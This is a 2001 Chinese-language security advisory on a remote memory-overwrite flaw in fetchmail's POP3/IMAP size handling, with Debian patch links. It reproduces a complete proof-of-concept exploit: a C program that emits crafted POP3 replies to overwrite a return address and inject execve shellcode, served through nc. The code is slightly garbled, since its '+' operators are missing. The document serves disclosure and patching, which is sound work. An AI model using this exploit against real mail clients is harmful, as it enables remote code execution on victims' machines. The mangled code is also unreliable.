fetchmail 远程内存重写漏洞
发布日期:2001-08-10
更新日期:2001-08-10
受影响系统:
描述:
Fetchmail <5.8.17
- Debian Linux 2.2 alias potato
Fetchmail存在两个远程安全漏洞,它们分别存在pop3.c和imap.c中。这两个漏洞是非常
相似的。攻击者可以将任意的4字节写到任意内存地址中。
有问题的代码如下(imap.c中有相似的代码):
pop3.c:
static int pop3_getsizes(int sock, int count, int *sizes)
[snip]
while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0)
{
int num, size;
if (DOTLINE(buf))
break;
else if (sscanf(buf, "%d %d", &num, &size) == 2)
sizes[num - 1] = size;
}
[snip]
上面代码使用sscanf从pop3(imap)服务器的应答数据中获取两个整型数据:num和size.
然后将size保存到sizes[num-1]中。因此,如果攻击者可以控制或者伪造服务器应答数据
的话,就可以控制num和size的数值,从而重写任意内存地址的内容,例如函数返回地址。
攻击者需要控制一台imap/pop3服务器,当远程用户使用fetchmail收取邮件时,攻击者
就可能以该远程用户的身份在其主机上执行任意代码。攻击者也可以利用DNS欺骗等方法
来进行攻击。
<*来源:Salvatore Sanfilippo (antirez@invece.org) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Salvatore Sanfilippo (antirez@invece.org)提供了如下测试代码:
/* fetchmail proof of concepts i386 exploit
* Copyright (C) 2001 Salvatore Sanfilippo <antirez@invece.org>
* Code under the GPL license.
*
* Usage: ./a.out | nc -l -p 3333
* fetchmail localhost -P 3333 -p POP3
*
* This is a bad exploit with offset carefully selected
* to work in my own system. It will probably not work in
* your system if you don't modify RETR_OFFSET and SHELL_PTR,
* but you may try to set the SHELL_PTR to 0xAAAAAAAA
* and use gdb to obtain the proof that your fetchmail is vulnerable
* without to exploit it.
* Or just read the code in pop3.c.
*
* To improve the exploit portability you may put the shellcode inside
* one of the static char buffers, grep 'static char' *.c.
*
* Tested on fetchmail 5.8.15 running on Linux 2.4.6
*
* On success you should see the ls output.
*/
#include <stdio.h>
#define MESSAGES 10
#define RETR_OFFSET -20
#define SHELL_PTR 0xbfffba94
int main(void)
{
int ish = SHELL_PTR;
int ret_offset = -10;
char shellcode[] = /* take the shellcode multiple of 4 in size */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0";
int *sc = (int*) shellcode;
int noop = 0x90909090;
int i;
/* OK for user and password, than report the number of messages */
printf(" OK\r\n OK\r\n OK\r\n OK %d 0\r\n OK 0\r\n OK\r\n", MESSAGES);
/* Overwrite the RET pointer */
for (i = ret_offset-20; i < ret_offset 20; i )
printf("%d %d\r\n", i, ish);
/* Put some NOP */
for (i = 1; i < 21; i )
printf("%d %d\r\n", i, noop);
/* Put the shell code in the buffer */
for (i = 21; i < 21 (sizeof(shellcode)/4); i )
printf("%d %d\r\n", i, *sc );
printf(".\r\n"); /* POP data term */
return 0;
}
建议:
厂商补丁:
1. fetchmail 5.8.17已经修复了这个漏洞,您可以在厂商主页上下载最新版本:
http://www.tuxedo.org/~esr/fetchmail/
2. Debian Linux (http://www.debian.org/security/)为此发布了一份安全公告 :
DSA-071-1 fetchmail remote exploit
http://www.debian.org/security/2001/dsa-071
补丁下载 -
________________________________________________________________________
Debian GNU/Linux 2.2 alias potato
Potato was released for alpha, arm, i386, m68k, powerpc and sparc.
Source archives:
http://security.debian.org/dists/stable/updates/main/source/fetchmail_5.3.3-3.diff.gz
MD5 checksum: a1ba0691be21e100b10beded89813911
http://security.debian.org/dists/stable/updates/main/source/fetchmail_5.3.3-3.dsc
MD5 checksum: b49e9eacda18f237ae066f085647d3f7
http://security.debian.org/dists/stable/updates/main/source/fetchmail_5.3.3.orig.tar.gz
MD5 checksum: d2cffc4594ec2d36db6681b800f25e2a
Architecture independent archives:
http://security.debian.org/dists/stable/updates/main/binary-all/fetchmailconf_5.3.3-3_all.deb
MD5 checksum: 223c6590b7495a41d4743d526222bc4f
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
